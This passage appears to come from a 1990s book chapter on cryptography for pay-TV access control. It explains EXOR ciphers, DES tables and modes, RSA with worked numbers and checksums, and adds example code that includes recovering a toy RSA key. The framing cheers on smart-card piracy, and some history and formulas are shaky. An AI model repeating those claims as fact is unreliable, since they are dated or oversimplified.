no government should bother enacting further legislation. The channels 
should be careful and remember the old saying about “he who fights 
monsters”. Meanwhile pirates are assured of an interesting, if nomadic, 
experience. 
This chapter is a basic introduction to cryptology and access control. The
field of cryptology is highly specialised and is intensely mathematical. There
are essentially two sub-fields: cryptanalysis and cryptography. Cryptanalysis
is effectively hacking. Cryptography is the development of code systems.


Access control is the denial of access to unauthorised users. This may 
seem a rather negative definition but it should be remembered that an 
access control system is designed with attack in mind. To win, a hacker has 
to conquer. In order for the cryptosystem to win it only has to survive. This is 
the defender's advantage. 


In an ideal world, peace protesters would feel really out of place. Access 
control is a real world concept. The access control system used on a 
Scrambling system has to be secure from hacking or at least not 
economical to hack. A good cryptographical system is essential. 


While a good cryptosystem is essential, it is not the element that ensures
security. The technology of the decoder and the smart card is, in the final
assessment, the one thing that makes the difference.


All of the smart card based hacks of the last four years have been based on
the algorithms and keys being extracted from the official smart cards and
being emulated on pirate smart cards. The technology of the smart cards is
clearly at fault here. The algorithms and keys, had they not been extracted,
would not, generally, have been hacked by other methods. I do not include
EuroCrypt-M in this group as it uses DES.


The 07 Ho Lee Fook hack on VideoCrypt was perhaps the most 
embarrassing thing ever to befall Sky and News Datacom. Well at least until 
the 09 and 10 Ho Lee Fooks. They had for years proclaimed that their 
system would defeat the hackers. News Datacom management people 
were interviewed by some reporters in the satellite TV press. These 
clueless individuals were easily convinced that VideoCrypt was the best 
system since the invention of sliced bread. This of course indicated that 
these reporters knew more about sliced bread than satellite television 
technology. 


It was such a shame that the hackers never believed these claims. The full 
details of the algorithms that the hackers used to hack the VideoCrypt 07 
and 09 cards are given in this chapter. Of course it is often said that we 
learn by our own mistakes. In this business, if we are lucky, we learn by the 
mistakes of others. 
Relying on a published specification is potentially fatal. It allows the hackers
to develop models of the system under attack. In some cases where a
published specification was used, the full implementation was not used. For
example EuroCrypt-M used DES with the Initial Permutation and inverse
Initial Permutation removed. It has been suggested that this was actually a
cunning plan by France Telecom to make the hackers too busy laughing to
hack.


Cryptography - The Basics 


Encryption And Key Distribution 


The procedure by which the original data, referred to as “plaintext”, is
encrypted and turned into encrypted data or “ciphertext” is called the
encryption algorithm. The algorithm is driven by a key. The most basic
formula is shown below.


f(Plaintext + Key) = Ciphertext
Where f is the algorithm


The security of an encryption system is dependent on the non-linearity of 
this algorithm. If there is a visible relationship between the plaintext and the 
ciphertext then it is highly probable that the system can be hacked. If the 
relationship is so non-linear that there is no immediately discernible 
correlation, then the algorithm is substantially more secure. 


The concept of encrypting a signal is extremely simple. There are two basic
processes, substitution and permutation, that are generally combined in
order to increase system security.


Substitution is where one element of a signal is replaced by another
element. For example, DDSO might become 2456. In this example, the
letters have been replaced by numbers. The ASCII code used on
computers is essentially a substitution coding system. Each letter is
assigned a number. The numbers can then be stored in the computer in
their binary equivalent.


Permutation is where the bits in a system are scrambled or mixed into 
another order. For example, ABCDEF might be translated to BACDEF. In its 
basic form, this is the simplest system to break. In each language, certain 
letters are statistically more likely to occur. In English, the commonest 
letters are E,T,N,A. Then there are other statistical occurrences such as 
letter pairs like TH, ST and EE. 
When these basic techniques are used together to securely encrypt data
streams, the combination is termed a product cipher.


Sometimes one or more fixed blocks of data are encrypted using a product 
cipher. This application is termed a block product cipher. The Data 
Encryption Standard, DES, is a block product cipher. 


The function of the key in an encryption algorithm is identical to the function 
of a key in a lock. The algorithm can be considered as a lock. When turned 
in one direction, the key locks or encrypts the data, when turned in the other 
direction, it unlocks or decrypts the data. 

The simplest algorithm uses the digital “exclusive or”, EXOR, function.
When two digital bits are compared in this function, the output is high when
only one of the bits is high. If both bits are high or both bits are low, then the
output is low.


Encryption Example Using EXOR Function


In this example, the word CAT is encrypted with the word DOG as the key.
Using ASCII codes, the letters can be represented by a series of numbers;
thus CAT becomes 67, 65, 84 and DOG becomes 68, 79, 71. If these
numbers are translated into their binary forms, the EXOR function can be
applied:

CAT = Plaintext          DOG = Key

CAT (data)      01000011 01000001 01010100
DOG (key)       01000100 01001111 01000111
Output          00000111 00001110 00010011

CAT             67  65  84
DOG             68  79  71
Ciphertext      07  14  19

The key returns the ciphertext to plaintext using the same EXOR function:


Decryption Example Using EXOR Function


Output (cipher) 00000111 00001110 00010011
DOG (key)       01000100 01001111 01000111
CAT (data)      01000011 01000001 01010100
As can be seen by comparison, the plaintext is returned by EXORing the
ciphertext with the key. The sender and the receiver must both be in
possession of the key to make the system work. Although this is an
exceedingly simple method of encrypting a datastream, in real world
systems the key length is generally very large so that the system is more
resistant to hacking. A simple EXOR cipher is also very dangerous.
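The CAT/DOG exchange above in executable form. This is an added example, not code from the book: it reproduces the EXOR of the ASCII codes given in the text and then shows the two properties behind the warning that a bare EXOR cipher is dangerous. The helper names and the second message COW are my own constructions.

```python
# Added example, not from the book: the CAT/DOG EXOR example worked in bytes,
# followed by the two properties that make a bare EXOR cipher "very dangerous":
# a single known plaintext/ciphertext pair hands over the key, and reusing one
# key on two messages cancels it out of their EXOR. CAT and DOG are the text's
# values; COW is a constructed second message.

def xor_bytes(a, b):
    """EXOR two equal-length byte strings; the same call encrypts and decrypts."""
    if len(a) != len(b):
        raise ValueError("key must be exactly as long as the data")
    return bytes(x ^ y for x, y in zip(a, b))

def bit_string(data):
    """Render bytes as the 8-bit groups the worked example prints."""
    return " ".join(f"{byte:08b}" for byte in data)

def recover_key(plaintext, ciphertext):
    """Known plaintext: key = plaintext EXOR ciphertext, by the same identity."""
    return xor_bytes(plaintext, ciphertext)

def key_reuse_leak(ciphertext1, ciphertext2):
    """Two messages under one key: c1 EXOR c2 == p1 EXOR p2, the key is gone."""
    return xor_bytes(ciphertext1, ciphertext2)

if __name__ == "__main__":
    key = b"DOG"
    ct = xor_bytes(b"CAT", key)
    print(bit_string(b"CAT"), "|", bit_string(key), "|", bit_string(ct))
    print(list(ct), xor_bytes(ct, key))          # [7, 14, 19] b'CAT'
    print(recover_key(b"CAT", ct))               # b'DOG'
```

Run as a script it prints the three bit rows of the worked example, the ciphertext bytes 07 14 19, and the key recovered from the plaintext/ciphertext pair; `key_reuse_leak` is what a system gives away when the same key is applied to two datastreams.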


The problem with scrambling systems is that the information being 
encrypted is not plain English or indeed any other language. It is seed 
information, channel authorisation data or tiering data. Essentially this kind 
of data is exactly that - data; a stream of binary or hexadecimal. The crypto 
algorithms encrypt and decrypt this data. 


The following are examples of some crypto algorithms. Many of the 
scrambling systems on the market do not employ the algorithms straight off 
the page. Instead they make modifications to the algorithms that complicate 
things for the potential hacker. In some cases, these modifications are 
necessary to allow the decoder or smart card to process the data. In others, 
these modifications make the algorithm more secure. 


The Data Encryption Standard 


Over the last few years, the Data Encryption Standard has come in for some 
intense study. Though originally the algorithm was analysed by academics 
and defence experts, it was the VideoCipher hack that really brought it to 
the attention of the hackers. 


However the main application of the algorithm in Europe has been as part of 
the EuroCrypt-M system. The differences between 1985 and 1996, in terms 
of computing power are vast. While in 1985, DES was a good algorithm, in 
1996 it is not strong enough for sensitive applications. It has largely been 
replaced by Public Key based algorithms such as RSA. 


The first form of DES was created by IBM in 1971. It was named Lucifer and 
was sold to Lloyds. The algorithm as it then existed was not extremely 
secure though very few people had the computer power to hack it. 


By 1974, the algorithm had been reinforced. The Lucifer algorithm had a
128 bit key. The US National Bureau Of Standards saw a need for a
standard encryption algorithm that could be used for non-classified
government data. The version submitted to the NBS had the key reduced to
64 bits.


The National Security Agency is the electronic eyes and ears of American
defence. While the Central Intelligence Agency deals with the ground truth
and analysis operations, the NSA monitors all electronic emissions of
interest. A 128 bit key DES algorithm would take longer to hack. The 56 bit
key version could be hacked within a few hours. The NSA had advised IBM
on the creation of certain elements of the algorithm.


For use as the Data Encryption Standard, the key was weakened and other 
areas of the algorithm were strengthened. This was necessary so that the 
NSA could hack the DES if required. This was a natural move for NSA. 
There are those who would protest at such a manipulation but then they are 
ignorant of the world of electronic intelligence. It would be the height of 
stupidity to provide one’s enemies with a near unhackable cipher system. 


The NBS approved the modified Lucifer algorithm for use as the Data 
Encryption Standard on 15:06:1977. It was documented in the Federal 
Information Processing Standards Publication 46, (FIPS PUB 46). 


The VideoCipher II scrambling system used the DES as the basis for
encrypting its digital audio data. As a direct result, more computer time and
mind power was tied up attempting to hack it inside the USA than outside.
According to some reports this disturbed the US government departments.
The algorithm was never hacked in the sense that someone came up with a
general solution. There have been a number of papers on hacking the DES.
However the time frames involved would make the hacks unusable. As in
most scrambling system applications the DES key changes monthly, weekly
or daily, a hack that produced the correct key in a few months is logically
useless unless you have recorded the programme and the datastream.


The use of the DES algorithm here in Europe has been somewhat sporadic. 
The most obvious use has been as the hash function in the France Telecom 
EuroCrypt-M specification. At the time, circa 1987, it was considered to be 
cryptographically secure and therefore France Telecom used this as the 
basis for their system. Of course with the current proliferation of the hacker 
software for EuroCrypt-M, it is difficult to understand why they continue to 
use this algorithm. 


There are a few methods of implementing the DES. The method that 
concerns us is the Electronic Code Book mode. This generates ciphertext 
from a 64 bit plain text block and a 64 bit key. This version is the one most 
commonly used in scrambling system applications. Often the initial and end 
permutations are removed to make the algorithm run faster in software. 
This is exactly how it is used in the EuroCrypt-M system. 


There are two basic forms of encryption; permutation and substitution. The
permutation form merely changes the position of the bits in the sequence.
The bits retain their same value, either 1 or 0. In some cases the word
transposition is used to describe the technique. The substitution form of
encryption actually changes the value of the bits. An encryption scheme
using both of these forms is generally referred to as a product cipher.
Because the input and output are in blocks of bits, the DES format is
referred to as a block product cipher.


• Electronic Code Book Mode


Key Generation 


The first stage of the DES algorithm is the generation of the keys. These
keys are generated from the 64 bit keyword, of which 56 bits are used. The
bits 8, 16, 24, 32, 40, 48, 56, and 64 are parity bits and are not used in the
key generation procedure. The parity is odd.


The Keyword, less the parity bits, is fed into a 1 row by 56 column
permutation. The permutation is then split into two smaller 1 row x 28
column permutations. The top permutation is used as C0 and the lower as
D0.


The permutation is referred to in the diagram as PC-1 or permuted choice 1.
Bit 57 would be the first bit of C0, bit 49 the second and bit 36 the last. Bit
63 would be the first bit of D0 and bit 4 would be the last.


In order to obtain the keys, the bits of C0 and D0 are left shifted by one or
two bits over the procedure. A left shift applied to C0 would result in 57
going to the end. The new first bit would be 49 and the new end bit would be
57.


The left shift is a lot less complicated than it sounds. It is also easily 
implemented in software or in hardware. The left shift function is a common 
function available in most assembler level languages. The function is also 
available in some of the higher level languages such as C. 


The keys are generated from the blocks by taking each block Cn and Dn 
and inputting them into the permutation PC-2 or permutated choice 2. This 
is a 1 row x 48 column permutation. The key length is 48 bits wide. 


The numbers in this permutation refer to the relative position of the bits of
the extended block [Cn, Dn]. The first bit of Cn would be the first bit of PC-2.
The last bit of Cn would be bit 28 of PC-2. The first bit of block Dn would be
bit 29 of PC-2 and the last bit of Dn would be bit 56 of PC-2.

DES KEY GENERATION

The process of key generation would be fast at machine code level and
even faster using dedicated circuitry. It is this element of speed that has led
some people to consider that it could be hacked using a parallel attack.


Other attacks such as the Biham-Shamir Differential Cryptanalysis of DES
and Matsui's Linear Cryptanalysis of DES have started to chip away at the
edifice. The paper on the DES Cracking engine by Wiener has demonstrated
that a DES Cracking engine is feasible for what is now a relatively small
investment.


The advances in technology have rendered this algorithm insecure for any 
sensitive application. Some one specifying this algorithm for use in a 
sensitive application should have his head checked, preferably as part of a 
post-mortem examination. 


PC-1

C0
57 49 41 33 25 17 09
01 58 50 42 34 26 18
10 02 59 51 43 35 27
19 11 03 60 52 44 36

D0
63 55 47 39 31 23 15
07 62 54 46 38 30 22
14 06 61 53 45 37 29
21 13 05 28 20 12 04


Left Shift Table
Step Shift   Step Shift   Step Shift   Step Shift
01   1       05   2       09   1       13   2
02   2       06   2       10   2       14   2
03   2       07   2       11   2       15   2
04   2       08   2       12   2       16   1


PC-2

14 17 11 24 01 05
03 28 15 06 21 10
23 19 12 04 26 08
16 07 27 20 13 02
41 52 31 37 47 55
30 40 51 45 33 48
44 49 39 56 34 53
46 42 50 36 29 32


The DES Encryption Routine 


The DES encryption routine is a complex and non-linear routine. The 
reason for this is security. There must be no discernible relationship 
between the input data or Plaintext and the output data or Ciphertext. 


The input block or plaintext is 64 bits wide. The block is first subjected to
permutation by insertion into the following 1 row x 64 column permutation
designated IP. The permutation is then split into two 32 bit blocks. These
are designated L0 and R0. L0 contains the first 32 elements and R0
contains the second 32 elements.

L0
58 50 42 34 26 18 10 02
60 52 44 36 28 20 12 04
62 54 46 38 30 22 14 06
64 56 48 40 32 24 16 08


R0
57 49 41 33 25 17 09 01
59 51 43 35 27 19 11 03
61 53 45 37 29 21 13 05
63 55 47 39 31 23 15 07


The basic step process of the routine can be thought of as a set of modules.
Starting with L0 and R0, R0 and the first key, K1, are inserted into the
encryption / decryption function module, f. The output of the encryption /
decryption function module, f, is EXORed with L0. The output of the EXOR
operation provides the new R1 block. The block R0 becomes the new L1
block. This circulation continues as far as L15 and R15.


The blocks L16 and R16 are called the Preoutput. Their sequence is [R16,
L16]. R16 is L15 EXORed with the output from the encryption/decryption
function module, f, whose inputs are R15 and K16. L16 is R15. The
Preoutput block is inserted into the inverse initial permutation.


Initial Permutation (IP)

58 50 42 34 26 18 10 02
60 52 44 36 28 20 12 04
62 54 46 38 30 22 14 06
64 56 48 40 32 24 16 08
57 49 41 33 25 17 09 01
59 51 43 35 27 19 11 03
61 53 45 37 29 21 13 05
63 55 47 39 31 23 15 07


Inverse Initial Permutation (IP^-1)

40 08 48 16 56 24 64 32
39 07 47 15 55 23 63 31
38 06 46 14 54 22 62 30
37 05 45 13 53 21 61 29
36 04 44 12 52 20 60 28
35 03 43 11 51 19 59 27
34 02 42 10 50 18 58 26
33 01 41 09 49 17 57 25


The inverse initial permutation provides the output block. This block is the 
Cipher text and is 64 bits wide. 


The Encryption/Decryption Function - f 


The actual operation of the function module is relatively simple. It appears 
complex, but it must be remembered that the process is optimised for a 
computer and not for a human mind. 


The R block is 32 bits wide. This block has to be expanded to a 48 bit wide 
block. The permutation used for this operation is designated the E-Bit 
Selection Table. The numbers refer to the bit positions in the R block. 


The 48 bit wide block generated from the R block by E is then EXORed with
the key to produce a 48 bit wide block. This block is split into eight 6 bit wide
sections. These 6 bit wide sections are inputted to eight selection function
modules, S1 to S8. These modules select a 4 bit block for the 6 bit input
section. These modules are 4 row x 16 column matrices. Since we are
dealing with binary numbers, it is necessary to have a row 0 and a column 0.


[Figure: DES Encryption Routine. Plaintext input block; L1 = R0,
R1 = L0 EXOR f(R0,K1); L2 = R1, R2 = L1 EXOR f(R1,K2); ... L15 = R14,
R15 = L14 EXOR f(R14,K15); L16 = R15, R16 = L15 EXOR f(R15,K16);
Preoutput.]


The first and last bits of the 6 bit input section are used to define the row.
The possible combinations are 00, 01, 10, 11. These equate to 0, 1, 2, 3 in
the decimal base.


The remaining four bits of the 6 bit input section are used to define the
column. The range of the bits is from 0000 to 1111 or in decimal base from
0 to 15.


To illustrate the concept, we will use 010111 as the input section for S1. The 
first and last bits define the row. Therefore the row is 01 or row 1. The 
remaining bits are 1011 or in decimal, 11. Therefore the column is 11. 


The row number is 1 and the column number is 11. By checking the value of 
the number at this co-ordinate in the S1 permutation, we obtain the four bit 
number. The value of the number at this location is 11 or in binary, 1011. 


This operation is carried out for the eight 6 bit input sections and their 
respective selection function modules or matrices. The result is a 32 bit 
wide block. 


The S-Boxes

S1
14 04 13 01 02 15 11 08 03 10 06 12 05 09 00 07
00 15 07 04 14 02 13 01 10 06 12 11 09 05 03 08
04 01 14 08 13 06 02 11 15 12 09 07 03 10 05 00
15 12 08 02 04 09 01 07 05 11 03 14 10 00 06 13

S2
15 01 08 14 06 11 03 04 09 07 02 13 12 00 05 10
03 13 04 07 15 02 08 14 12 00 01 10 06 09 11 05
00 14 07 11 10 04 13 01 05 08 12 06 09 03 02 15
13 08 10 01 03 15 04 02 11 06 07 12 00 05 14 09

S3
10 00 09 14 06 03 15 05 01 13 12 07 11 04 02 08
13 07 00 09 03 04 06 10 02 08 05 14 12 11 15 01
13 06 04 09 08 15 03 00 11 01 02 12 05 10 14 07
01 10 13 00 06 09 08 07 04 15 14 03 11 05 02 12


E-Bit Selection Table
32 01 02 03 04 05
04 05 06 07 08 09
08 09 10 11 12 13
12 13 14 15 16 17
16 17 18 19 20 21
20 21 22 23 24 25
24 25 26 27 28 29
28 29 30 31 32 01
[Figure: DES Encryption/Decryption Function f. R block (32 bits) in,
f(R,K) (32 bits) out.]
S4
07 13 14 03 00 06 09 10 01 02 08 05 11 12 04 15
13 08 11 05 06 15 00 03 04 07 02 12 01 10 14 09
10 06 09 00 12 11 07 13 15 01 03 14 05 02 08 04
03 15 00 06 10 01 13 08 09 04 05 11 12 07 02 14

S5
02 12 04 01 07 10 11 06 08 05 03 15 13 00 14 09
14 11 02 12 04 07 13 01 05 00 15 10 03 09 08 06
04 02 01 11 10 13 07 08 15 09 12 05 06 03 00 14
11 08 12 07 01 14 02 13 06 15 00 09 10 04 05 03

S6
12 01 10 15 09 02 06 08 00 13 03 04 14 07 05 11
10 15 04 02 07 12 09 05 06 01 13 14 00 11 03 08
09 14 15 05 02 08 12 03 07 00 04 10 01 13 11 06
04 03 02 12 09 05 15 10 11 14 01 07 06 00 08 13

S7
04 11 02 14 15 00 08 13 03 12 09 07 05 10 06 01
13 00 11 07 04 09 01 10 14 03 05 12 02 15 08 06
01 04 11 13 12 03 07 14 10 15 06 08 00 05 09 02
06 11 13 08 01 04 10 07 09 05 00 15 14 02 03 12

S8
13 02 08 04 06 15 11 01 10 09 03 14 05 00 12 07
01 15 13 08 10 03 07 04 12 05 06 11 00 14 09 02
07 11 04 01 09 12 14 02 00 06 10 13 15 03 05 08
02 01 14 07 04 10 08 13 15 12 09 00 03 05 06 11


P Permutation

16 07 20 21
29 12 28 17
01 15 23 26
05 18 31 10
02 08 24 14
32 27 03 09
19 13 30 06
22 11 04 25


The 32 bit wide output from the selection modules, S1 to S8, is inputted to 
the P permutation which is 1 row x 32 columns. The permutation is referred 
to as the Permutation Function P. The numbers refer to the position of the 
bits in the 32 bit wide output from the selection modules. The numbers run 
from left to right. 
DES Decryption Routine


The same algorithm is used for decryption. The key application sequence is 
reversed. The sixteenth key, K16, is used in the first place or round and the 
first key, K1, is used in the last round. 


There are a number of keys for which another key exists with an equivalent
effect. These keys produce all zeros or all ones, or an alternating zero one
pattern, after the first step of the key generation routine.


The other DES modes are Cipher Block Chaining, (CBC); Cipher Feedback, 
(CFB) and Output Feedback, (OFB). These modes are more secure than 
the basic Electronic Code Book mode. 


While these other modes are arguably more secure, they are not used that 
much in scrambling systems. The primary reason for this is that most of the 
implementations of DES are software based and these modes would create 
more of a load for the microcontroller. A secondary reason is that the 
Electronic Code Book mode is more robust in terms of transmission. The 
longer between key changes in a system, the more robust that system is 
against sparklies. 


• Cipher Block Chaining - CBC


The principle behind CBC is simple. Each 64 bit plaintext input block is 
EXORed with the previous 64 bit ciphertext block. 


On the surface it appears straightforward. The problems lie in the beginning 
block and the fact that each output block is a function of all of the previous 
blocks. Since the first block has no previous ciphertext block, an initialising 
variable or block has to be used. 


Since all subsequent blocks are functions of the previous blocks, an error in 
one block will cause errors all of the subsequent blocks. The term for this is 
“error extension”. On encrypted audio this will show up as crackling. On 
encrypted video it shows up as sparklies. On data it requires the complete 
retransmission of the data. Error checking is carried out on the ciphertext 
rather than on the plaintext. 


• Cipher Feedback - CFB


Cipher Feedback mode is used where the plaintext used is continually less 
than a full 64 bit block. To reach a full block, the plaintext would have to be 
padded out with random data. Since the number of bits used is less than 64, 
the technique is commonly referred to as “M bit Cipher Feedback”. M is any 
number between 1 and 64. 
In this mode, the input to the DES algorithm is the previous 64 bits of
ciphertext. The input to the DES algorithm is held in a shift register that has
an initial value at the start of transmission. The M bit plaintext is EXORed
with the left most bits of the output of the DES algorithm. The ciphertext
produced is then fed back into the shift register.


• Output Feedback - OFB


Output Feedback mode uses the output of the DES algorithm as the 
feedback to the DES input shift register. This is referred to as “M Bit Output 
Feedback”. M is any number between 1 and 64. In this mode the output of 
the DES algorithm is EXORed with the M bit plaintext. 


If the receiver and transmitter lose synch then a new initial value must be 
inputted to the shift register. It is not necessary for the initial values to be 
encrypted. 
The RSA Algorithm


The RSA algorithm, or to give it its proper title, the Rivest Shamir Adleman
algorithm, relies on the difficulty of factoring large numbers. Mathematically it
is one of the simplest algorithms. Computationally, it can give a few
problems. These problems can be overcome but the algorithm is slow
compared to the DES.


The RSA crypto system is a Public Key System. This means that one key is
used to encrypt the data and another key is used to decrypt the data. The
encryption key is a pair of integers (N,P). The decryption key is the integer
pair (N,S). The integer S is kept secret. The integers N and P are published.
This is the mathematical definition. From here on I will refer to S as the
secret key, P as the public key and N as the address.


Modulo arithmetic is used in the algorithm. For those who have temporarily
forgotten how modulo arithmetic works, this is a very brief explanation. In the
example below, the result of the Mod operation is the remainder left over
after subtracting the nearest integer multiple of N that does not exceed the
number being reduced.


Thus if N = 5
17 Mod 5 = 2
5 * 3 = 15
17 - 15 = 2


There are four basic elements in the system. The first two elements are
prime numbers. (They are only divisible by themselves and one.) These will
be called X and Y in the example.


The third and fourth elements are the secret and public keys. The secret 
key is a prime number. The public key is chosen using the formula below. In 
the example, the secret key is S and the public key is called P. 


The product of the primes X and Y is also published. This is like the 
telephone number of the user. In the example this product is called N. 


X = Prime Number 1          S = Secret Key (Prime)

Y = Prime Number 2          P = Public Key

N = X * Y                   P is chosen so that P * S Mod ((X-1)*(Y-1)) = 1
                            P = (((X-1)*(Y-1)) + 1) / S

Encrypting:
ciphertext = (plaintext)^P Mod N


Decrypting:
plaintext = (ciphertext)^S Mod N


As can be seen from the above, it is simple in theory. To obtain the
ciphertext from the plaintext, raise the plaintext to the Pth power modulo N.
To recover the plaintext from the ciphertext, raise the ciphertext to the Sth
power modulo N.


Worked Example Of RSA Algorithm
X = 47 (Prime 1)            S = 97 (Secret Key - Prime)

Y = 79 (Prime 2)            P = ((47-1)*(79-1) + 1)/97 = 3589/97 = 37

N = 47 * 79 = 3713

Plaintext = AT


To convert this into a simple numeric code, each letter of the alphabet is 
assigned a number from 1 to 26. Therefore AT becomes 120. 


Encrypting:
Raise 0120 to the 37th power modulo 3713
ciphertext = 120^37 Mod 3713
ciphertext = 1404


The method used to raise the plaintext to the 37th power modulo 3713 is 
known as “Exponentiation By Repeated Squaring And Multiplication”. It is a 
very elegant mathematical short cut. Of course this is not the only algorithm 
that could have been used in this application. 


There are some good algorithms that could be used for implementing RSA
in microcontroller software. The reason that the “Exponentiation By
Repeated Squaring And Multiplication” is used as an example is because it
is easily understood and can be implemented in a high level language
without great difficulty.

The “Exponentiation By Repeated Squaring And Multiplication” algorithm is
shown below.


The Algorithm

To obtain M^H Mod N
Step 1: Write H in its binary format (Hn ... H1), Hn being the most
        significant bit.
Step 2: Set C = 1
        C = C^2 = 1
        C = M * C Mod N
        Note Hn is always 1.
Step 3: Set i = n - 1 where n is the number of digits in binary H.
Step 4: Set C = Remainder when C^2 is divided by N
Step 5: If Hi = 1 then set C = Remainder when C * M is divided by N
Step 6: Decrement i by 1
Step 7: Halt if i = 0 else goto step 4


Applying this to the figures in the example gives:
M = 120, H = 37 and N = 3713.  Binary H = 100101


Step 1: C = 1

C = 120 * C Mod 3713 = 120 Mod 3713 = 120 ..... 1
i = 6

C = 120^2 Mod 3713 = 3261 ..... 0
i = 5

C = 3261^2 Mod 3713 = 89 ..... 0
i = 4

C = 89^2 Mod 3713 = 495
C = (495 * 120) Mod 3713 = 3705 ..... 1
i = 3

C = 3705^2 Mod 3713 = 64 ..... 0
i = 2

C = 64^2 Mod 3713 = 383
C = (383 * 120) Mod 3713 = 1404 ..... 1
i = 1


Therefore 120^37 Mod 3713 = 1404
Decrypting:
To decrypt the ciphertext raise 1404 to the 97th power modulo 3713.
plaintext = 1404^97 Mod 3713
In this case M = 1404, H = 97 and N = 3713.  Binary H = 1100001


C = 1404 * C Mod 3713 = 1404 ..... 1

C = 1404^2 Mod 3713 = 3326
C = (3326 * 1404) Mod 3713 = 2463 ..... 1

C = 2463^2 Mod 3713 = 3040 ..... 0

C = 3040^2 Mod 3713 = 3656 ..... 0

C = 3656^2 Mod 3713 = 3249 ..... 0

C = 3249^2 Mod 3713 = 3655 ..... 0

C = 3655^2 Mod 3713 = 3364
C = (3364 * 1404) Mod 3713 = 120 ..... 1


Therefore plaintext = 120


The use of the "Exponentiation By Repeated Squaring And Multiplication" 
algorithm allows the whole process of implementing the RSA algorithm to 
be easily computerised. In fact a very simple BASIC program can be written 
for the implementation. 


The main factor in the security of the RSA algorithm is the size of the prime 
numbers used. These numbers are generally over a hundred digits long. A 
simple search of low primes would have revealed the values chosen in the 
example. A computer program to factor the address N would take less than 
a second. Once the primes X and Y are known, the value of the secret key 
S can be calculated by rearranging the formula used to obtain the public key 
P. In this case divide by P rather than S. 
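The whole RSA walk-through above (key derivation, exponentiation by repeated squaring and multiplication, and the toy-size recovery of S from N and P) as an added C example; it is not the book's code and it also covers the sign-with-S, verify-with-P swap of the RSA Signature section below. It uses the book's values X=47, Y=79, S=97, P=37 and plaintext 120; the function names and the trial-division helper are this example's own.

```c
#include <stdint.h>
#include <stdio.h>

/* The book's toy parameters (real keys use primes of over a hundred digits). */
#define PRIME_X 47ULL
#define PRIME_Y 79ULL
#define SECRET_S 97ULL

/* Exponentiation by repeated squaring and multiplication: m^h mod n.
   The bits of h are scanned from the leading 1 downwards: square at every
   bit (Step 4), multiply by m when the bit is 1 (Step 5). All values here
   are below 2^32, so the products fit in a 64 bit integer. */
uint64_t modexp(uint64_t m, uint64_t h, uint64_t n)
{
    uint64_t c = 1;
    int i = 63;
    while (i > 0 && !((h >> i) & 1))
        i--;                              /* find the leading 1 of binary H */
    for (; i >= 0; i--) {
        c = (c * c) % n;                  /* C = C^2 mod N */
        if ((h >> i) & 1)
            c = (c * m) % n;              /* C = C*M mod N */
    }
    return c;
}

/* Public key from the book's formula P = ((X-1)*(Y-1)+1)/S. The formula
   assumes P*S = (X-1)*(Y-1) + 1 exactly, which holds for the book's numbers
   (37*97 = 3589); it returns 0 when S does not divide that value. A general
   implementation finds P with the extended Euclidean algorithm instead. */
uint64_t public_key(uint64_t x, uint64_t y, uint64_t s)
{
    uint64_t t = (x - 1) * (y - 1) + 1;
    return (t % s == 0) ? t / s : 0;
}

/* "Divide by P rather than S": once X and Y are known, S follows from the
   same formula. The primes are found by trial division of N, which is only
   feasible because N is tiny; that is exactly the weakness the book notes. */
uint64_t recover_secret_key(uint64_t n, uint64_t p)
{
    for (uint64_t x = 2; x * x <= n; x++) {
        if (n % x == 0) {
            uint64_t t = (x - 1) * (n / x - 1) + 1;
            return (t % p == 0) ? t / p : 0;
        }
    }
    return 0;
}

uint64_t rsa_encrypt(uint64_t plain, uint64_t p, uint64_t n) { return modexp(plain, p, n); }
uint64_t rsa_decrypt(uint64_t cipher, uint64_t s, uint64_t n) { return modexp(cipher, s, n); }

/* RSA signature: the transmitter raises the message to the power S; the
   receiver raises the result to the power P and compares it with the message. */
uint64_t rsa_sign(uint64_t msg, uint64_t s, uint64_t n) { return modexp(msg, s, n); }
int rsa_verify(uint64_t msg, uint64_t sig, uint64_t p, uint64_t n)
{
    return modexp(sig, p, n) == msg;
}

int main(void)
{
    uint64_t n = PRIME_X * PRIME_Y;                         /* 3713 */
    uint64_t p = public_key(PRIME_X, PRIME_Y, SECRET_S);    /* 37 */
    uint64_t c = rsa_encrypt(120, p, n);                    /* 1404 */
    printf("N=%llu P=%llu ciphertext=%llu plaintext=%llu\n",
           (unsigned long long)n, (unsigned long long)p, (unsigned long long)c,
           (unsigned long long)rsa_decrypt(c, SECRET_S, n));
    printf("S recovered from N and P alone: %llu\n",
           (unsigned long long)recover_secret_key(n, p));
    return 0;
}
```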
Authentication And Verification


Authentication is now essential in crypto systems. The decoder or smart 
card must be able to verify that the packet of data it received was indeed 
sent by the headend and not by a hacker trying to interfere. It should not be 
possible to bypass the authentication procedure in the decoder. 


The significance of authentication has only been emphasised in the last few 
years by what happens when it is absent. The best example was the 
Phoenix hack on VideoCrypt that allowed the card to be activated for all 
channels. This happened because it was possible to send a properly 
authenticated message to the smart card and the smart card acted upon 
that message as it considered it to be genuine. 


If the hacker is able to bypass the authentication procedure, it is a disaster 
in terms of security. It basically means that the hacker has control over what 
goes on in the decoder. The best example of this can be found in the
VideoCipher II. VideoCipher II was based on a hierarchical key set. A
monthly key decoded the session key. The monthly key was transmitted in
an encrypted form to each authorised decoder using that decoder’s unique
key as the encryption key. The monthly key could be decrypted with a valid
key. It did not matter that the key used in a descrambler was not the actual
descrambler's key but one extracted from another descrambler. This was a
disaster for VideoCipher II and it was something that the system never fully
recovered from.


• Checksums


A checksum is the first level of authentication on a packet of data. It 
basically ensures that the packet is intact. However it does not confirm that 
the packet has not been tampered with. 


Basically a checksum is a value that is obtained when the other bytes in the 
packet are subjected to some simple mathematical operation. The card or 
decoder can execute the same mathematical operation and should arrive at 
the same result as the checksum. 


The commonest forms of checksums are the Modulo Arithmetic checksum 
and the Cyclic Redundancy Check (CRC). Of the two the Modulo Arithmetic 
checksum is the fastest to implement. 


The simplest of these, the Modulo Arithmetic checksum, is merely a value
that is required to bring the sum of the bytes in the packet to a multiple of N.
The result of a mod N operation should be zero for a valid packet.


However such a simplistic test cannot determine that a packet is valid. It will
still give a valid result if the order of the bytes in the packet is changed. This
type of checksum was used on the VideoCrypt system as the first level of
authentication on the 74h packet.


The Cyclic Redundancy Check is more complex. The data is expressed as 
a polynomial. This polynomial is then divided by a small fixed polynomial. 
The result of this division operation is CRC. This CRC data is then 
appended to the data. 


On the receiving end, the decoder divides the whole packet by the small 
fixed polynomial. The result if the packet is valid, should be zero. 


There are, of course, vulnerabilities. If the small fixed polynomial can be 
identified by a hacker, then it is possible to create properly checksummed 
packets. 
